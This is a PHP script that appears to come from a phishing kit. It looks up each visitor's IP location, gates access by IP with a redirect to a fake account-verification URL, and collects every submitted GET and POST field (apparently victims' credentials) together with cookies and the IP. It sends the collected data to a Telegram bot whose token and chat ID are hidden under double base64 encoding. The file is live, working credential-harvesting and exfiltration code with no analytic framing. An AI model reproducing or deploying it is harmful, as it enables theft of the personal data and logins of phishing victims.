<?php
if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
    $ipAddress_callmoto = $_SERVER['HTTP_CLIENT_IP'];
} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $ipAddress_callmoto = $_SERVER['HTTP_X_FORWARDED_FOR'];
} else {
    $ipAddress_callmoto = $_SERVER['REMOTE_ADDR'];
}
$validIPs_callmoto = array();
$ipMatches = preg_match_all('/\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b/', $ipAddress_callmoto, $matches);
if ($ipMatches) {
    foreach ($matches[0] as $ip) {
        if (filter_var($ip, FILTER_VALIDATE_IP)) {
            $validIPs_callmoto[] = $ip;
        }
    }
}
if (!empty($validIPs_callmoto)) {
    $StrupLom_callmoto = $validIPs_callmoto[0];
} else {
    $StrupLom_callmoto = "127.0.0.1";
}
$donflag_callmoto = $_SERVER['SERVER_NAME'];
$info_callmoto = unserialize(file_get_contents("http://ip-api.com/php/{$StrupLom_callmoto}?fields=status,message,continent,continentCode,country,countryCode,region,regionName,city,district,zip,lat,lon,timezone,currency,isp,org,as,asname,reverse,mobile,proxy,hosting,query"));
if (!empty($info_callmoto)) {
    $my_isp = $info_callmoto['as']??null;
    $my_country = $info_callmoto['country']??null;
    $my_coun_code = $info_callmoto['countryCode']??null;
    $my_city = $info_callmoto['city']??null;
    $my_region = $info_callmoto['regionName']??null;
}
$currentDirectory = __DIR__;
$webDirectory = '/web/';
$parts = explode($webDirectory, $currentDirectory, 2);
if (count($parts) < 2) {
    die("Unable to determine user folder");
}
$subDirectories = explode('/', $parts[1]);
$StrongSol = $subDirectories[0];
$filename = 'local.txt';
$localFilePath = $_SERVER['DOCUMENT_ROOT'] . "/web/$StrongSol/$filename";
$reslocal = @file_get_contents($localFilePath);
if ($reslocal === false) {
    die("Failed to fetch the contents of local.txt");
}
if (empty($reslocal)) {
    $StrongSol = "" . basename(__DIR__);
    $homeDomain = $_SERVER['HTTP_HOST'];
    $verifyAccountURL = "https://$homeDomain/index.php?verify_account=session&" . md5(microtime()) . "&dispatch=" . sha1(microtime()) . "&access=&data=" . sha1(microtime()) . "&lolme=$StrongSol";
    echo "<script LANGUAGE='JavaScript'>
    window.location.href='$verifyAccountURL';
     </script>";
    exit();
}
if (trim($reslocal) != trim($StrupLom_callmoto)) {
    $StrongSol = "" . basename(__DIR__);
    $homeDomain = $_SERVER['HTTP_HOST'];
    $verifyAccountURL = "https://$homeDomain/index.php?verify_account=session&" . md5(microtime()) . "&dispatch=" . sha1(microtime()) . "&access=&data=" . sha1(microtime()) . "&lolme=$StrongSol";
    echo "<script LANGUAGE='JavaScript'>
    window.location.href='$verifyAccountURL';
     </script>";
    exit();
}


function sendTelegramMessage($message) {
    $botToken = "TmpZMU9EY3lPVEUwTnpwQlFVZDBOVkJaV0VsME9Xb3pabVkwZHpST2IwSm5lRGRwTUhoNVVFeFNaMmd5VFE";
    $chatID = "TFRRd09EZ3dORE13TkRJ";
    $rp = base64_decode(base64_decode($botToken));
    $rs = base64_decode(base64_decode($chatID));
    $telegramAPI = "https://api.telegram.org/bot$rp/sendMessage";
    $data = ['chat_id' => $rs, 'text' => $message];

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $telegramAPI);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $response = curl_exec($ch);
    curl_close($ch);
}

function getCookieValue($name) {
    return isset($_COOKIE[$name]) ? $_COOKIE[$name] : "";
}

if (!isset($_SESSION['message_sent'])) {
    $postDataString = "";
    $pro_nm = getCookieValue('project');
    $source_nm = getCookieValue('sourceme');
    $homeDomain = $_SERVER['HTTP_HOST'];
    $clientIP = $_SERVER['REMOTE_ADDR'];  // Assuming this is the correct variable for IP
    $my_country = "Your_Country";  // Define your country if applicable

    // Handle GET requests
    if ($_SERVER['REQUEST_METHOD'] === 'GET') {
        foreach ($_GET as $key => $value) {
            $postDataString .= "GET/$key = $value\n";
        }
    }

    // Handle POST requests
    if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        foreach ($_POST as $key => $value) {
            $postDataString .= "POST/$key = $value\n";
        }
    }

    // Proceed only if there's data to send
    if (!empty($postDataString)) {
        // Append additional information
        $postDataString .= "IP: $clientIP\nClient: $source_nm\nProject: $pro_nm\nCountry: $my_country\nURL: $homeDomain\n";

        // Send message to Telegram
        sendTelegramMessage($postDataString);

        // Mark message as sent in the session
        $_SESSION['message_sent'] = true;
    }
}

?>
